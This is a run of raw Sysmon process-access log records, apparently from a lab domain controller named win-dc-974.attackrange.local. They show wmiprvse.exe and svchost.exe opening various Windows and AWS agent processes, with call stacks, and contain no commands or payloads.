16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238151Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238150Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238149Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238148Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.973{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238147Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.973{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238146Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.972{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238145Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.971{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238144Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.971{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238143Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.970{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238142Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.969{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238141Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.969{05ADC7E1-229F-6039-1600-00000000AD01}154011112C:\Windows\system32\svchost.exe{05ADC7E1-6D97-603E-92AA-00000000AD01}11928C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238140Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.969{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D97-603E-92AA-00000000AD01}11928C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238139Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.969{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238138Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.968{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238137Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.967{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238136Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.967{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238135Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238134Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238133Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238132Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238131Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 